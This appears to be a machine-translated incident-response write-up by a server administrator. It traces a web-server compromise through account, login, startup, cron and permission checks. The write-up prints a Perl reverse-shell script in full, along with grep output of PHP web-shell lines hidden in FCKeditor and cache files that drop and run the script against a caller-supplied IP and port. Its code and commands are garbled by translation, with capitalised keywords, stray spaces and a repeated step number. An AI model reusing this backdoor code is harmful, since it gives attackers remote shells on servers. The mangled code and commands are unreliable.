Web Server bug-catching stenographer

A server is suspected of being infected with a Trojan. Baidu searches the website and most of the results are pornographic websites.
Log on to the server immediately (in the middle of the night ). Perform the following steps:
1. Check the system account to see if there are any abnormal accounts-for example, impersonate a system account and change a letter to make it look like a system account. Some guys cleverly work and create an account as "..." Extremely imperceptible.
2. Check the ip address of the recently logged-on user: last. Check the current status after January 1, September 9. It is confirmed that there is an incorrect ip address.
3. Check the system initialization file inittab. The running level is 3, which indicates an exception is detected. Some hackers like to start here and add respawn to ensure that their programs are automatically restarted after they are killed, and they are indomitable in fighting against the system administrator's kill.
4. Check the scripts in the running directory, such as ls-al/etc/rc3.d. No exception is found.
5. Check the automatic task crontab-l. the root user and the web running user www are checked each time. No exception is found.
6. Check the history record history and find that sendmail is installed. Ask the customer if this is the case. A: It is not installed by yourself.
7. Check the web directory and find that the permission is 777. This is reassuring. I guess it may be from here.
8. Check the directory/tmp and find that the file is not very good. The file name is spider_bc. Open it and check it. It is a perl script with the following content:
[Root @ localhost mysql] # more/tmp/spider_bc
#! /Usr/bin/perl
Use Socket;
$ Cmd = "lynx ";
$ System = 'echo "'uname-a'"; echo "'id'";/bin/Sh ';
$0 = $ cmd;
$ Target = $ ARGV [0];
$ Port = $ ARGV [1];
$ Iaddr = inet_aton ($ target) | die ("Error: $! \ N ");
$ Paddr = sockaddr_in ($ port, $ iaddr) | die ("Error: $! \ N ");
$ Proto = getprotobyname ('tcp ');
Socket (SOCKET, PF_INET, SOCK_STREAM, $ proto) | die ("Error: $! \ N ");
Connect (SOCKET, $ paddr) | die ("Error: $! \ N ");
Open (STDIN, "> & SOCKET ");
Open (STDOUT, "> & SOCKET ");
Open (STDERR, "> & SOCKET ");
System ($ system );
Close (STDIN );
Close (STDOUT );
Close (STDERR );
According to the response of the customer's developers, the file will be automatically generated after it is deleted.
9. It is initially suspected that hacker will automatically generate this file after uploading the program using web permission settings and program vulnerabilities, and then go to the root directory of the website and execute grep-r "spider "*, after a moment, the result is displayed. The following section is recorded:
[Root @ localhost www] # grep spider_bc *-r
/Plusbak/viev. php: echo File_Write ('/tmp/spider_bc', base64_decode ($ back_connect_pl), 'wb ')? 'Created/tmp/spider_bc successfully <br> ': 'failed to create/tmp/spider_bc <br> ';
/Plusbak/viev. php: echo Exec_Run ($ perlpath. '/tmp/spider_bc '. $ _ POST ['yourip']. ''. $ _ POST ['yourport']. '&')? 'Nc-l-n-v-P'. $ _ POST ['yourport']: 'COMMAND execution failed ';
/Plusbak/viev. php: echo File_Write ('/tmp/spider_bc.c', base64_decode ($ back_connect_c), 'wb ')? 'Created/tmp/spider_bc.c successfully <br> ': 'failed to create/tmp/spider_bc.c <br> ';
/Plusbak/viev. php: @ unlink ('/tmp/spider_bc.c ');
/Plusbak/viev. php: echo Exec_Run ('/tmp/spider_bc '. $ _ POST ['yourip']. ''. $ _ POST ['yourport']. '&')? 'Nc-l-n-v-P'. $ _ POST ['yourport']: 'COMMAND execution failed ';
/Developers/FCKeditor/editor/skins/images. php: echo File_Write ('/tmp/spider_bc', base64_decode ($ back_connect_pl), 'wb ')? 'Created/tmp/spider_bc successfully <br> ': 'failed to create/tmp/spider_bc <br> ';
/Developers/FCKeditor/editor/skins/images. php: echo Exec_Run ($ perlpath. '/tmp/spider_bc '. $ _ POST ['yourip']. ''. $ _ POST ['yourport']. '&')? 'Nc-l-n-v-P'. $ _ POST ['yourport']: 'COMMAND execution failed ';
/Developers/FCKeditor/editor/skins/images. php: echo File_Write ('/tmp/spider_bc.c', base64_decode ($ back_connect_c), 'wb ')? 'Created/tmp/spider_bc.c successfully <br> ': 'failed to create/tmp/spider_bc.c <br> ';
/Developers/FCKeditor/editor/skins/images. php: @ unlink ('/tmp/spider_bc.c ');
/Developers/FCKeditor/editor/skins/images. php: echo Exec_Run ('/tmp/spider_bc '. $ _ POST ['yourip']. ''. $ _ POST ['yourport']. '&')? 'Nc-l-n-v-P'. $ _ POST ['yourport']: 'COMMAND execution failed ';
/Developers/cache/default/index_ SQL .php: echo File_Write ('/tmp/spider_bc', base64_decode ($ back_connect_pl), 'wb ')? 'Created/tmp/spider_bc successfully <br> ': 'failed to create/tmp/spider_bc <br> ';
/Developers/cache/default/index_ SQL .php: echo Exec_Run ($ perlpath. '/tmp/spider_bc '. $ _ POST ['yourip']. ''. $ _ POST ['yourport']. '&')? 'Nc-l-n-v-P'. $ _ POST ['yourport']: 'COMMAND execution failed ';
/Developers/cache/default/index_ SQL .php: echo File_Write ('/tmp/spider_bc.c', base64_decode ($ back_connect_c), 'wb ')? 'Created/tmp/spider_bc.c successfully <br> ': 'failed to create/tmp/spider_bc.c <br> ';
/Developers/cache/default/index_ SQL .php: @ unlink ('/tmp/spider_bc.c ');
/Developers/cache/default/index_ SQL .php: echo Exec_Run ('/tmp/spider_bc '. $ _ POST ['yourip']. ''. $ _ POST ['yourport']. '&')? 'Nc-l-n-v-P'. $ _ POST ['yourport']: 'COMMAND execution failed ';
9. The problem is basically identified, and the parties are informed that the problem will be restored first and then fought again tomorrow.

Author "sery"